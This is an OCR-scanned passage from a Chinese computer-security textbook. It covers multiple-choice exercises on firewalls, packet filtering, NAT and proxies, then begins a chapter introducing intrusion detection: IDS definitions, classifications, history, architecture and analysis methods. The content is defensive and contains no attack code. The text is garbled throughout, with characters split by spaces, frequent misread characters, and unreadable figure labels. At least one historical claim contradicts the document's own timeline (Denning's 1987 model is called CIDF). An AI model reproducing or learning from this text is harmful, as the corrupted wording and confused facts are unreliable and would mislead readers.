C. 机 构 有 强大 的 集中 安全 策略 

D. 使 用 了 DHCP 这 样 的 动态 IP 地 址 分 配 协议 

数据 包 不 属于 包 过 滤 一 般 需 要 检查 的 部 分 是 (  )。 

A. IP 源 地 址 和 目的 地 址 B. 源 端 口 和 目的 端口 

C. 协议 类 型 D. TCP 序列 号 

包 过 滤 的 优点 不 包括 ( 。””)。 

A. 处 理 包 的 数据 比 代理 服务 器 快 B. 不 需要 额外 费用 

C. 对 用 户 是 透明 的 D. 包 过 滤 防 火 墙 易于 维护 

关于 状态 检查 技术 ,说 法 错误 的 是 (  )。 

A. 跟踪 流 经 防火 墙 的 所 有 通信 信息 

B. 采用 一 个 “监测 模块 "执行 网 络 安全 策略 

C. 对 通信 连接 的 状态 进行 跟踪 与 分 析 

D. 状态 检查 防火 墙 工作 在 协议 的 最 底层 ,所 以 不 能 有 效 地 监测 应 用 层 的 数据 
状态 检查 防火 墙 的 优点 不 包括 (  )。 

A. 高 安全 性 B. 高 效 性 

C. 可 伸缩 性 和 易 扩 展 性 D. 易 配 置 性 

关于 网 络 地 址 翻译 技术 的 说 法 ,错误 的 是 (  )。 

A. 只 能 进行 一 对 一 的 网 络 地 址 翻译 B. 解决 IP 地 址 空间 不 足 问 题 


C. 向 外 界 隐 藏 内 部 网 结构 D. 有 多 种 地 址 翻译 模式 
网 络 地 址 翻译 的 模式 不 包括 ( 。 )。 

A. 静态 翻译 B. 动态 翻译 

C. 负载 平衡 翻译 D. 随机 地 址 翻译 


关于 代理 技术 的 说 法 ,错误 的 是 (  )。 

A. 代理 技术 又 称 为 应 用 层 网 关 技 术 

B. 代理 技术 针对 每 一 个 特定 应 用 都 有 一 个 程序 
C. 代理 是 企图 在 网 络 层 实 现 防火 墙 的 功能 

D. 代理 也 能 处 理 和 管理 信息 
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10.14 关于 代理 技术 的 特点 的 说 法 ,错误 的 是 (  )。 

A. 速度 比 包 过 滤 防 火 墙 要 快 得 多 

B. 对 每 一 类 应 用 ,都 需要 一 个 专门 的 代理 

C. 灵活 性 不 够 

D. 代理 能 理解 应 用 协议 ,可 以 实施 更 细 粒 度 的 访问 控制 
10.15 关于 代理 技术 优点 的 说 法 ,错误 的 是 (  )。 

A. 易于 配置 ,界面 友好 

B. 不 允许 内 外 网 主机 的 直接 连接 

C. 可 以 为 用 户 提供 透明 的 加 密 机 制 

D. 对 于 用 户 是 透明 的 


424 


第 11 章 ”入侵 检测 与 防御 
11.1 人 侵 检测 技术 概述 


1. 入 侵 检测 的 由 来 

试图 破坏 信息 系统 的 完整 性 .机 密 性 .可 信 性 的 任何 网 络 活动 都 称 为 网 络 人 侵 。 防 范 网 
络 人 侵 最 常用 的 方法 就 是 防火 墙 。 防 火 墙 (Firewall) 是 设置 在 不 同 网 络 的 边界 或 网 络 安全 
域 之 间 ,简单 实用 、 透 明度 高 ,但 是 单纯 的 防火 墙 无 法 防范 复杂 多 变 的 攻击 。 防 火 墙 具 是 一 
种 被 动 防御 性 的 网 络 安全 工具 ,本 身 可 能 具有 漏洞 ,或 者 入 侵 者 绕 过 防火 墙 进行 攻击 。 防 火 
墙 对 来 自 内 部 的 攻击 无 能 为 力 ,不 能 检查 合法 流量 中 是 否 包含 着 恶意 的 入 侵 代码 ,因此 不 能 
满足 用 户 复杂 的 应 用 要 求 。 而 入 侵 系 统 正 变 得 越 来 越 容易 ,各 种 入 侵 教 程 和 工具 随手 可 得 。 

互联 网 的 无 处 不 在 已 经 完全 改变 了 我 们 所 知道 的 网 络 。 过 去 完全 孤立 的 网 络 现 在 连接 
到 了 全 世界 。 这 种 无 处 不 在 的 连接 使 企业 能 够 完成 过 去 不 可 想象 的 任务 。 然 而 ,与 此 同时 
还 存在 一 个 黑暗 面 。 互 联网 变 成 了 网 络 犯罪 分 子 的 天 堂 。 这 些 网 络 犯罪 分 子 利用 这 种 连接 
向 企业 发 起 了 数量 空前 的 多 种 攻击 。 当 互联 网 最 初 开始 流行 的 时 候 , 企 业 开 始 认识 到 它们 
应 该 使 用 防火 墙 防止 对 它们 实施 的 攻击 。 防 火 墙 通过 封锁 没有 使 用 的 TCP 和 UDP 端口 发 
挥 作用 。 虽 然 防火 墙 在 封锁 某 些 端口 的 攻击 是 有 效 的 ,但 是 有 些 端口 对 于 HTTP、SMTP 
和 POP3 通信 和 是 有 用 的 。 为 了 保证 这 些 服务 工作 正常 ,对 这 些 常 用 服务 的 对 应 端口 必须 要 
保持 开放 的 状态 。 问 题 是 黑客 已 经 学 会 了 如 何 让 恶意 通信 通过 这 些 通常 开放 的 端口 。 

审计 是 最 早 引 入 计算 机 安全 领域 的 概念 ,系统 的 操作 和 用 户 都 要 经 过 行为 审核 , 存 取 文 
件 、 更 新 内 容 等 活动 都 记录 在 审计 数据 中 。 审 计 技 术 产 生 、 记 录 并 检查 按时 间 顺 序 排列 的 系 
统 事件 记录 的 过 程 。 审 计 的 目标 是 确定 和 保持 系统 活动 中 每 个 人 的 责任 ,监测 系统 的 问题 
区 域 ,是 阻止 系统 的 不 正当 使 用 ,重建 事件 .评估 损失 ,灾难 恢复 的 有 效 依据 。 传 统 的 安全 机 
制 从 主观 的 角度 设计 ,访问 控制 和 保护 模型 存在 弱 口 令 、 软 件 BUG 和 系统 漏洞 等 问题 , 没 
有 根据 网 络 攻击 的 具体 行为 来 决定 安全 对 策 ,审计 也 对 入 侵 行为 的 反应 较 迟 钝 ,很 难 发 现 未 
知 的 攻击 行为 ,不 能 根据 网 络 行为 的 变化 来 及 时 地 调整 系统 的 安全 策略 。1980 年 安德森 提 
出 入 侵 检测 概念 ,保护 系统 敏感 信息 ,检查 、 分 析 网 络 行为 ,保护 系统 免 受 攻击 ,成 了 今天 
IDS 研究 的 核心 内 容 。 入 侵 检测 技术 正 是 根据 网 络 攻击 行为 而 进行 设计 的 , 它 不 仅 能 够 发 
现 已 知人 侵 行为 ,而 且 有 能 力 发 现 未 知 的 入 侵 行为 ,并 可 以 通过 学 习 和 分 析 入 侵 手段 ,及 时 
地 调整 系统 策略 以 加 强 系统 的 安全 性 。 

2. 入 侵 检 测 概念 

攻击 是 出 于 某 种 动机 利用 工具 对 目标 系统 采取 的 恶意 企图 或 行为 ,其 后 果 是 获取 、 破 
坏 、 自 改 目标 系统 的 数据 或 访问 权限 。 事 件 是 在 攻击 过 程 中 发 生 的 可 以 识别 的 行动 或 行动 
造成 的 后 果 , 系 统 中 的 事件 常常 是 具有 一 系列 属性 和 可 供用 户 查看 的 详细 描述 信息 。 入 侵 
(Intrusion) 是 对 信息 系统 的 非 授权 访问 或 未 经 许可 的 操作 ,这 种 冯 入 或 误 用 可 能 来 自 外 部 
网 络 或 内 部 合法 用 户 。 
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入 侵 有 以 下 6 种 方式 : 尝试 性 攻击 .伪装 攻击 ` 安 全 控制 系统 渗透 泄漏 .拒绝 服务 和 恶 
意 使 用 。 

人 侵 检 测 是 一 种 主动 的 计算 机 系统 安全 防御 措施 。 入 侵 检测 是 对 系统 的 运行 状态 进行 
监视 ,识别 和 发 现 各 种 攻击 企图 或 行为 ,从 系统 运行 过 程 中 产生 的 或 系统 所 处 理 的 各 种 数据 
中 查找 出 威胁 系统 安全 的 因素 ,并 对 威胁 做 出 相应 的 处 理 ,以 保证 系统 资源 的 机 密 性 、 完 整 
性 和 可 用 性 。 

入 侵 检测 技术 是 一 种 集 监控 、 预 防 和 防御 系统 入 侵 行为 为 一 体 的 动态 安全 机 制 。 作 为 
传统 安全 机 制 的 补充 ,入侵 检测 技术 不 再 是 被 动 地 对 入 侵 行 为 进行 识别 和 防护 ,而 是 能 够 提 
出 预警 并 实行 相应 反应 动作 。 

人 侵 检 测 系 统 (Intrusion Detection System,IDS) 是 识别 针对 计算 机 系统 和 网 络 的 非法 
攻击 和 入 侵 的 安全 防御 系统 。 可 以 检测 包括 外 界 非 法 入 侵 者 的 恶意 攻击 或 试探 ,以 及 内 部 
合法 用 户 的 超越 使 用 权限 的 非法 行动 ,并 做 出 适当 的 报警 (或 阻 断 ) 等 响应 ,以 便 堵 塞 漏 洞 和 
修复 系统 。IDS 是 辅助 进行 人 侵 检测 或 者 独立 进行 人 侵 检测 的 软件 与 硬件 组 合 ,是 防火 墙 
之 后 的 第 二 道 安全 闸门 ,在 不 影响 网 络 性 能 的 情况 下 能 对 网 络 进 行 监测 ,提供 对 内 部 攻击 、 
外 部 攻击 和 误 操 作 的 实时 保护 。 一 般 并 不 严格 区 分 人 侵 检 测 与 IDS。 

3. 入 侵 检 测 系统 功能 

IDS 具有 如 下 功能 : 

(1) 监控 并 分 析 用 户 和 系统 的 行为 活动 。 

(2) 检查 系统 配置 和 漏洞 。 

(3) 评估 系统 关键 资源 和 数据 文件 的 完整 性 。 

(4) 识别 已 知 的 攻击 行为 以 及 统计 分 析 异 常 行为 。 

(5) 对 操作 系统 进行 日 志 管 理 ,并 跟踪 识别 违反 安全 策略 的 用 户 活动 。 

(6) 针对 已 发 现 的 攻击 行为 做 出 适当 的 反应 ,如 警告 .终止 进程 等 。 

(7) 自动 收集 与 系统 相关 的 补丁 。 

4. 入 侵 检 测 系统 分 类 

(1) 根据 信息 源 可 以 分 为 基于 主机 的 入 侵 检测 系统 (Host Intrusion Detection System， 
HIDS) 和 基于 网 络 的 入 侵 检 测 系统 (Network Intrusion Detection System,NIDS)。HIDS 
数据 来 源 于 主机 系统 ,通常 是 系统 日 志和 审计 记录 。NIDS 能 够 截获 网 络 中 的 数据 包 , 提 取 
其 特征 并 与 知识 库 中 已 知 的 攻击 签名 相 比 较 , 从 而 达到 检测 的 目的 。 

(2) 根据 数据 分 析 方 法 分 为 异常 入侵 检测 系统 和 误 用 入侵 检测 系统 。 异 常 入 侵 检 测 系 
统 根据 异常 行为 和 使 用 计算 机 资源 的 情况 来 检测 人 侵 , 即 检测 与 正常 行为 相 违背 的 行为 。 
误 用 入侵 检测 系统 利用 已 知 系统 和 应 用 软件 的 弱点 攻击 模式 来 检测 人 侵 , 即 直接 检测 不 利 
的 或 不 可 接受 的 行为 。 误 用 检测 基于 已 知 的 系统 缺陷 和 和 人 侵 模式 , 故 又 称 为 特征 检测 。 它 
能 够 准确 地 检测 到 某 些 特征 的 攻击 ,但 却 过 度 依赖 事先 定义 好 的 安全 策略 ,所 以 无 法 检测 系 
统 未 知 的 攻击 行为 ,从 而 产生 漏 警 。 

(3) 根据 体系 结构 分 为 集中 式 人 侵 检测 系统 和 分 布 式 人 侵 检测 系统 。 集 中 式 人 侵 检测 
系统 的 所 有 数据 采集 和 分 析 活动 均 是 由 一 台 主 机 来 独立 地 完成 ,适用 于 网 络 环境 比较 简单 
的 情况 。 分 布 式 人 侵 检 测 系统 是 由 分 布 在 一 个 大 型 网 络 中 的 多 个 人 侵 检测 系统 (IDS) 所 构 
成 的 有 机 系统 ,IDS 通过 彼此 间 的 通信 和 协调 来 协同 展开 各 种 数据 采集 ,分 析 和 事件 检测 活 
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动 , 共 同 实现 对 整个 网 络 全 面 而 有 效 的 监控 。 

(4) 根据 响应 方式 分 为 被 动 响应 系统 和 主动 响应 系统 。 被 动 响应 系统 只 会 发 出 警告 通 
知 ,将 发 生 的 不 正常 情况 报告 给 系统 管理 员 , 本 身 并 不 试图 降低 所 造成 的 破坏 ,更 不 会 主动 
对 攻击 者 采取 反击 行为 。 主 动 响应 系统 通过 调整 被 攻击 系统 的 状态 ,阻止 或 者 减轻 攻击 影 
响 , 如 断 开 网 络 连接 .增加 安全 日 志和 杀 死 可 疑 进程 等 。 

5. 入 侵 检测 发 展 史 

入 侵 检测 技术 从 出 现 到 现在 已 有 30 多 年 ,IDS 系统 已 从 有 线 IDS 发 展 到 无 线 IDS ,并 
出 现 了 IPS(Intrusion Prevention System, 和 人 侵 防 御 系统 )。 入 侵 检测 技术 可 以 分 为 三 个 发 
展 阶段 : 

第 一 阶段 (20 世纪 80 年 代 ) 主 要 是 主机 日 志 分 析 和 模式 匹配 技术 研究 。 推 出 了 IDES 
(Intrusion Detection Expert System, 人 人 侵 检测 专家 系统 )、DIDS (Distributed Intrusion 
Detection System, 分 布 式 人 侵 检 测 系统 ) 和 NSM(Network Security Monitor, 网 络 安全 监 
控 系 统 ) 等 ,基本 上 都 是 实验 室 系统 。 

第 二 阶段 (20 世纪 90 年 代 ) 主 要 研究 网 络 数 据 包 截获 、 主 机 系统 的 审计 数据 分 析 , 以 及 
基于 网 络 的 IDSCNIDS) 和 基于 主机 的 IDS(HIDS) 的 明确 分 工 和 合作 技术 。 代 表 性 产品 有 
早期 的 ISS RealSecure(v6.0 之 前 )、Cisco 和 Snort 等 。 

第 三 阶段 (20 世纪 90 年 代 后 期 ) 主 要 涉及 协议 分 析 、 行 为 异常 分 析 技 术 。 协 议 分 析 技 
术 的 误 报 率 是 传统 模式 匹配 的 1/4 左右 。 行 为 异常 分 析 技术 的 出 现 则 赋予 了 第 三 代 IDS 系 

统 识 别 未 知 攻击 的 能 力 。 代 表 人 性 产品 有 NetworkICE (2001 年 并 入 ISS)、 安 氏 
LinkTrustNetworkDefender(v6.6) 和 NFR( 第 2 版 ) 等 。 

1980 年 ,在 James P.， Anderson 的 文章 Computer Security Threat Monitoring and 
Surveillance 中 ,入 侵 检测 ?的 概念 首次 被 提出 ,详细 阑 述 了 入 侵 检 测 的 概念 ,将 计算 机 系统 
威胁 分 为 外 部 渗透 、 内 部 渗透 和 不 法 行为 三 种 类 型 ,提出 了 利用 审计 跟踪 数据 监视 入 侵 活动 
的 思想 ,为 开发 基于 主机 的 IDS 提供 了 最 初 的 理论 基础 。 

1984 年 一 1986 年 ,乔治 敦 大 学 的 Dorothy Denning 及 SRI/CSL 的 Peter Neumann 研 
究 出 了 一 个 实时 入 侵 检 测 系统 模型 一 一 IDES( 入侵 检 测 专家 系统 )。1987 年 ,Denning 提出 
了 一 种 通用 的 入 侵 检测 模型 CIDF ,使 用 了 异常 检测 器 和 专家 系统 。 

1990 年 ,加 州 大 学 戴 维 斯 分 校 的 L. T. Heberlein 等 人 提出 了 基于 网 络 的 入 侵 检测 概 
念 ,即将 网 络 数据 流 作 为 审计 数据 来 追踪 可 疑 的 行为 ,可 以 在 不 将 审计 数据 转换 成 统一 格式 
的 情况 下 监控 异种 主机 。 

1992 年 ,加 州 大 学 的 Koral llgun 开发 出 实时 入 侵 检 测 系统 USTAT(A State 
Transition Analysis Tool for UNIX) 。 他 们 提出 的 状态 转换 分 析 法 ,使 用 系统 状态 与 状态 
转换 的 表达 式 描述 和 检测 已 知 的 入侵 手段 ,使 用 反映 系统 状态 转换 的 图 表 直 观 地 记载 渗透 
细节 。 

1994 年 , 普 渡 大 学 计算 机 系 COAST 实验 室 的 Mark Crosbie 和 Gene Spafford 研究 了 
遗传 算法 在 入 侵 检测 中 的 应 用 。 使 用 遗传 算法 构建 的 智能 代理 (Autonomous Agents) 程 序 
能 够 识别 人 侵 行为 ,而 且 这 些 Agents 具有 “学 习 ” 用 户 操 作 习 惯 的 初步 智能 。 

1996 年 ,加 州 大 学 戴 维 斯 分 校 的 Staniford 等 研究 人 员 提 出 了 基于 图 表 的 入 侵 检测 系 
统 (Graph-based Intrusion Detection System,GrIDS) 原 理 , 并 完成 了 原型 的 设计 和 实现 。 


427| 


《计算 机 系统 安全 》 ETES 


1996 年 ,Forrest 将 免疫 原理 运用 到 分 布 式 入 侵 检测 领域 。 此 后 ,在 IDS 中 还 出 现 了 遗 
传 算法 、 遗 传 编程 的 运用 。 

1997 年 3 月 ,美国 国防 部 高 级 研究 计划 局 (DARPA) 开 始 着 手 通用 入 侵 检 测 框架 
(Common Intrusion Detection Framework,CIDF) 标 准 的 制定 ,加 州 大 学 戴 维 斯 分 校 的 安全 
实验 室 完 成 了 CIDF 标准 。 

1997 年 9 月 ,Intrusion. com 公司 推出 基于 主机 的 IDS, Agents 技术 第 一 次 出 现在 IDS 
的 市 场 产品 中 。 

1998 年 1 月 ,哥伦比亚 大 学 的 Wenke Lee 和 Salvatore J. Stolfo 提出 和 实现 了 在 CIDF 
上 实现 多 级 IDS, 并 将 数据 挖掘 技术 应 用 到 入 侵 检测 中 ,利用 数据 挖掘 中 的 关联 规则 等 算法 
提取 程序 和 用 户 的 行为 特征 ,并 根据 这 些 特 征 生成 安全 事件 的 分 类 模型 。 

1998 年 12 月 ,Marty Roesch 推出 了 Snort 第 一 版 , 基于 网 络 的 IDS, 采 用 误 用 检测 技 
术 。 目 前 已 成 为 应 用 广泛 的 IDS 之 一 。 

2001 年 1 月 ,Entercept Security Technology 公司 的 IDS 产品 Entercept 的 新 版 本 检测 
水 平 进 一 步 提高 ,并 首先 提出 和 人 侵 防 御 (Intrusion Prevention,IP) 概 念 。 由 于 已 有 的 入 侵 检 
测 系统 是 被 动 的 进行 系统 安全 防护 , 当 发 现 攻击 而 不 能 及 时 做 出 防护 反应 时 ,攻击 的 成 功率 
会 随 着 时 间 的 增加 而 提高 。 

2002 年 6 月 ,Entercept 公司 开始 提供 更 先进 的 入侵 防御 软件 ,能 够 在 黑客 的 攻击 造成 
伤害 之 前 采取 行动 来 阻止 其 发 生 ,增加 了 名 为 Vault Mode 的 先进 封锁 功能 ,能 够 锁 住 重要 
的 操作 系统 文件 和 设置 ,防止 主机 被 攻击 。 

2003 年 以 来 ,全 球 众多 安全 研究 机 构 都 在 开展 人 侵 检测 的 研究 ,许多 新 的 入 侵 检 测 技 
术 被 应 用 到 IDS 产品 中 。Cheung、Steven 等 人 提出 入 侵 容 忍 (Intrusion Tolerance) 的 概念 ， 
在 IDS 中 引入 了 容错 技术 。 

2006 年 ,Morton Swimmer 针对 现代 数据 网 络 的 分 布 式 防御 提出 一 个 危险 模型 的 免疫 
系统 等 。 

6. IDS 的 特点 、 挑 战 与 发 展 方向 

IDS 提高 了 信息 系统 安全 体系 其 他 部 分 的 完整 性 ,提高 了 系统 的 监察 能 力 。IDS 可 以 
跟踪 用 户 从 进入 到 退出 的 所 有 活动 或 影响 ,能 够 识别 并 报告 数据 文件 的 改动 ;可 以 发 现 系 统 
配置 的 错误 ,并 能 在 必要 时 予以 改正 ;可 以 识别 特定 类 型 的 攻击 ,并 进行 报警 ,做 出 防御 响 
应 。IDS 还 可 以 使 管理 人 员 升 级 新 版 程序 ,允许 非 专 业 人 员 从 事 系 统 安全 工作 ,为 信息 系统 
安全 提供 指导 。 

但 IDS 也 具有 许多 局 限 性 。 入 侵 检测 不 是 万 能 的 ,在 无 人 干预 的 情形 下 ,无 法 执行 对 
攻击 的 检测 ;无 法 感知 组 织 ( 公 司 ) 安 全 策略 的 内 容 ; 不 能 弥补 网 络 协议 的 漏洞 ;不 能 弥补 系 
统 提供 信息 的 质量 或 完整 性 问题 ;不 能 分 析 网 络 繁忙 时 的 所 有 事务 ;不 能 总 是 对 数据 包 级 的 
攻击 进行 处 理 等 。 

现 有 的 分 布 式 人 侵 检测 系统 具有 和 人 侵 检测 实时 性 较 差 .错误 分 析 集中 在 中 央 数 据 分 析 
器 .处理 能 力 受 网 络 性 能 限制 、 难 以 实现 互 操作 等 局 限 性 。 

入 侵 检测 系统 的 挑战 包括 : 

(1) 如 何 提高 人 侵 检测 系统 的 检测 速度 ,以 适应 网 络 通信 的 要 求 。 

(2) 如 何 减少 入 侵 检测 系统 的 漏 报 和 误 报 ,提高 其 安全 性 和 准确 度 。 
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(3) 如 何 提高 人 侵 检测 系统 的 互动 性 能 ,从 而 提高 整个 系统 的 安全 性 能 。 

和信 侵 检测 的 发 展 方向 有 体系 结构 研究 响应 技术 、 智 能 人 侵 检测 、 宽 带 高 速 实时 的 检测 
技术 ,检测 技术 的 整合 性 、 高 层 统计 与 决策 、 入 侵 检 测 的 评测 方法 和 入 侵 检 测 系统 的 标准 
化 等 。 


11.2 人 侵 检测 原理 与 技术 


11.2.1 入 侵 检测 原理 


1. IDS 基本 结构 
和 人 侵 检测 系统 处 理 的 基本 流程 包括 数据 收集 .数据 分 析 和 结果 处 理 , 如 图 11. 1 所 示 。 


数据 | 莫 | 数据 | 获 | 事件 | 镇 | 结果 
收 分 处 加 
集 本 加 


图 11.1 入 侵 检测 系统 基本 流程 


IDS 基本 结构 包括 信息 收集 器 .分析 器 数据库. 目录 服务 器 和 响应 ,如 图 11. 2 所 示 。 
其 中 信息 收集 器 、 分 析 器 和 事件 数据 库 构 成 探测 器 (Sensor) 或 引擎 ,也 有 将 分 析 器 和 数据 库 
独立 出 来 的 ;目录 服务 器 .策略 数据 库 和 响应 构成 IDS 的 控制 台 , 如 图 11. 3 所 示 。IDS 探测 
器 具有 读 取 原 始 数据 ,特征 提取 与 匹配 、 策 略 执行 .产生 事件 等 功能 ,控制 台 具 有 事件 读 取 、 
显示 与 分 析 、 策 略 定制 .响应 处 理 等 功能 。 


信息 收集 器 响应 


分 析 器 数据 库 目录 服务 器 
图 11.2 入 侵 检 测 系统 基本 结构 


信息 收集 器 是 用 于 收集 事件 的 信息 ,用 于 分 


IDS 控 制 中 心 
析 判 定 是 否 发 生 入 侵 。 信 息 收 集 器 通常 分 为 网 络 
级 别 、 主 机 级 别 和 应 用 程序 级 别 。 被 收集 的 信息 和 宙 件 上 报 
可 以 发 送 到 分 析 器 处 理 ,或 者 存放 在 数据 库 中 等 
待 处 理 。 
分 析 器 是 对 由 信息 源 生成 的 事件 做 分 析 处 IDS 引 车 
理 , 确 定 哪些 事件 与 正在 发 生 或 者 已 经 发 生 的 入 图 11.3 IDS 产品 部 件 


侵 有 关 。 两 个 最 常用 的 分 析 方 法 是 误 用 检测 和 异 
常 检测 。 分 析 器 的 结果 可 以 被 响应 ,或 者 保存 在 数据 库 作 统计 。 

数据 库 保存 事件 、 攻 击 特征 等 信息 包括 正常 和 入 侵 事件 。 数 据 库 还 存储 临时 处 理 数 据 ， 
扮演 各 个 组 建 之 间 的 数据 交换 中 心 的 角色 。 数 据 库 可 能 随 信息 收集 器 和 分 析 器 的 位 置 分 别 
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存储 事件 源 数据 和 攻击 特征 。 

目录 服务 器 保存 入侵 检测 系统 中 各 个 组 件 及 其 功能 的 目录 信息 。 在 一 个 比较 大 的 入侵 
检测 系统 中 起 很 重要 的 作用 ,改进 系统 的 维护 性 和 扩展 性 。 

响应 就 是 当 入 侵 事 件 发 生 时 ,系统 采取 的 一 系列 动作 ,分 为 主动 响应 和 被 动 响应 两 类 。 
主动 响应 能 自动 干预 系统 ;被 动 响应 给 管理 员 提 供 信息 ,再 由 管理 员 采 取 行 动 。 

2. 信息 收集 

入 侵 检测 的 第 一 步 是 在 信息 系统 的 一 些 关键 点 上 收集 信息 ,收集 内 容 包 括 系统 、 网 络 、 
数据 及 用 户 活动 的 状态 和 行为 。 由 于 从 一 个 来 源 的 信息 有 可 能 看 不 出 疑点 ,可 能 需要 尽 可 
能 扩大 检测 范围 ,包括 不 同 网 段 和 不 同 主机 。 

收集 信息 的 可 靠 性 和 正确 性 依赖 于 IDS 本 身 的 安全 性 、 软 件 系统 的 完整 性 和 网 络 通信 
的 可 靠 性 。 信 息 收 集 的 来 源 包 括 系统 或 网 络 的 日 志文 件 、 网 络 流量 .系统 目录 和 文件 的 异常 
变化 及 程序 执行 中 的 异常 行为 等 。 

(1) 系统 或 网 络 的 日 志文 件 。 充 分 利用 主机 和 网 络 日 志文 件 信息 是 检测 和 人 侵 的 必要 条 
件 。 日 志文 件 中 记录 了 各 种 行为 类 型 ,每 种 类 型 又 包含 不 同 的 信息 。 例 如 记录 “用 户 活动 ” 
类 型 的 日 志 , 就 包含 登录 、 用 户 ID 改变 ,用户 对 文件 的 访问 .授权 和 认证 信息 等 内 容 ; 异 常用 
户 行为 就 是 重复 登录 失败 .登录 到 不 期 望 的 位 置 以 及 非 授权 的 企图 访问 重要 文件 等 。 查 看 
日 志文 件 ,能 够 发 现成 功 的 入 侵 或 人 侵 企 图 。 

(2) 网 络 流量 。 网 络 流量 异常 ,例如 某 种 数据 包 数 量 巨大 ,或 定期 定量 ,或 上 传 或 下 载 
量 大 。 

(3) 系统 目录 和 文件 的 异常 变化 。 重 要 系统 文件 和 私有 数据 文件 经 常 是 黑客 修改 或 破 
坏 的 目标 ,例如 目录 和 文件 中 不 期 望 的 改变 (包括 修改 .创建 和 删除 ) ,特别 是 那些 正常 情况 
下 限制 访问 的 ,很 可 能 就 是 一 种 人 侵 产生 的 指示 和 信号 。 替 换 、 修 改 和 破坏 获得 访问 权 的 系 
统 上 的 文件 ,如 改变 日 志 。 

(4) 程序 执行 中 的 异常 行为 。 包 括 将 程序 或 服务 的 运行 分 解 ,从 而 导致 它 的 失败 ;以 非 
用 户 或 管理 员 意图 的 方式 操作 ; 非 正常 访问 进程 的 系统 资源 .程序 代码 和 数据 文件 等 。 

(5) 物理 形式 的 入 侵 信息 。 在 内 部 网 络 安装 非 授 权 的 设备 和 软件 ,成 为 威胁 网 络 安全 
的 后 门 。 可 以 造成 对 网 络 的 未 授权 连接 ,对 物理 资源 的 未 授权 访问 。 

基于 网 络 的 信息 收集 主要 用 于 实时 监控 网 络 关键 路 径 。 它 的 隐蔽 性 好 ,视野 宽 、 侦 测速 
度 快 .占用 资源 少 、 实 施 简便 ,并 且 还 可 以 用 单独 的 计算 机 实现 ,不 增加 主机 负担 。 但 难于 发 
现 所 有 数据 包 ,对 于 加 密 环境 无 能 为 力 , 用 在 交换 式 以 太 网 上 比较 困难 。 

基于 主机 的 信息 收集 包括 二 进 制 完整 性 检查 .记录 分 析 和 非法 进程 关闭 等 。 适 合 在 交 
换 网 络 中 ,但 对 网 络 流量 不 敏感 ,并 且 由 于 运行 在 后 台 , 不 能 访问 被 保护 系统 的 核心 功能 (不 
能 将 攻击 阻挡 在 协议 层 之 外 ) 。 它 可 以 利用 操作 系统 提供 的 功能 ,结合 异常 分 析 , 较 准确 地 
报告 攻击 行为 ,而 不 是 根据 网 上 收集 到 的 数据 包 去 猜测 发 生 的 事件 。 但 是 不 同 的 平台 要 开 
发 不 同 的 程序 , 且 增 加 了 主机 的 负担 。 

基于 主机 和 基于 网 络 的 信息 收集 两 者 具有 互补 性 。 

3. 信息 分 析 

数据 分 析 是 IDS 的 核心 , 它 的 功能 就 是 对 从 数据 源 提 供 的 系统 运行 状态 和 活动 记录 进 
行 同步 整理 组织、 分 类 以 及 各 种 类 型 的 细致 分 析 , 提 取 其 中 包含 的 系统 活动 特征 或 模式 ， 
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用 于 对 正常 和 异常 行为 的 判断 。 

数据 分 析 的 方法 有 模式 匹配 ,统计 分 析 、 专 家 系统 和 完整 性 分 析 。 前 3 种 方法 用 于 实时 
的 入 侵 检测 ,而 完整 性 分 析 则 用 于 事后 分 析 。 

(1) 模式 匹配 。 将 收集 到 的 信息 与 已 知 的 网 络 人 侵 和 系统 误 用 模式 数据 库 进行 比较 ， 
从 而 发 现 违背 安全 策略 的 行为 。 模 式 匹配 是 基于 已 知 系统 缺陷 和 入 侵 模式 ,并 事先 定义 了 
一 些 非 法 行为 的 模式 。 其 优点 是 只 需 收 集 相 关 的 数据 集合 ,显著 减少 系统 负载 ,上 且 技术 已 相 
当成 熟 , 检 测 准确 率 和 效率 都 相当 高 。 但 缺点 是 过 度 依赖 事先 定义 好 的 安全 策略 ,不 能 检测 
系统 未 知 的 攻击 行为 和 手段 ,可 能 产生 漏 报 。 需 要 不 断 的 升级 以 对 付 不 断 出 现 的 黑客 攻击 
手法 。 

一 般 来 讲 , 一 种 攻击 模式 可 以 用 一 个 过 程 (如 执行 一 条 指令 ) 或 一 个 输出 (如 获得 权限 ) 
来 表示 。 该 过 程 可 以 很 简单 ,如 通过 字符 串 匹 配 以 寻找 一 个 简单 的 条 目 或 指令 ;也 可 以 很 复 
杂 , 如 利用 正规 的 数学 表达 式 来 表示 安全 状态 的 变化 。 

串 匹 配 是 通过 对 系统 之 间 传 输 的 或 系统 自身 产生 的 特征 文本 进行 子 串 匹配 实现 。 特 征 
串 匹 配 规则 简单 高效、 快速 ,但 灵活 性 较 差 。 状 态 建 模 将 入 侵 行 为 表示 成 许多 个 不 同 的 状 
态 。 状 态 是 时 间 序 列 模型 ,可 以 再 细 分 为 状态 转换 和 Petri 网 。 

(2) 统计 分 析 。 首 先 给 系统 对 象 (如 用 户 .文件 .目录 和 设备 等 ) 创 建 一 个 统计 描述 , 统 
计 正 常 使 用 时 的 一 些 测 量 属 性 (如 访问 次 数 .操作 失败 次 数 和 延 时 等 )。 比 较 观察 值 和 测量 
属性 的 平均 值 ,如 果 观 察 值 在 正常 值 范围 之 外 ,就 认为 有 入 侵 发 生 。 其 优点 是 可 检测 到 未 知 
的 人 侵 和 更 为 复杂 的 入 侵 , 但 误 报 、 漏 报 率 高 , 且 不 适应 用 户 正常 行为 的 突然 改变 。 

(3) 专家 系统 。 用 专家 系统 对 入侵 进行 检测 ,经 常 是 针对 有 特征 入 侵 行为 。 为 每 个 人 
侵 行 为 抽取 特征 值 ,然后 根据 特征 值 进行 推理 ,判断 是 否 为 人 侵 。 专 家 系统 的 内 容 是 一 系列 
的 知识 , 即 * 规 则 ”, 专 家 系统 的 有 效 性 完全 取决 于 专家 系统 知识 库 的 完备 性 。 

(4) 完整 性 分 析 。 检 测 某 个 文件 或 对 象 的 完整 性 ,分 析 其 是 否 被 修改 ,包括 文件 和 目录 
的 内 容 及 属性 。 不 管 模式 匹配 方法 和 统计 分 析 方 法 是 否 能 成 功 检测 入 侵 , 只 要 是 成 功 的 攻 
击 导 致 了 文件 或 其 他 对 象 的 任何 改变 ,都 能 够 被 发 现 。 缺 点 是 一 般 以 批 处 理 方式 实现 ,是 事 
后 检测 ,不 用 于 实时 响应 。 

4. 数据 库 

数据 库 记 录 IDS 需要 的 关键 数据 ,包括 特征 数据 库 、 事 件数 据 库 、 策 略 与 规则 数据 库 。 

(1) 特征 数据 库 用 于 判别 入侵 行为 特征 (Signature) 种 类 的 样板 数据 。 例 如 来 自 保留 
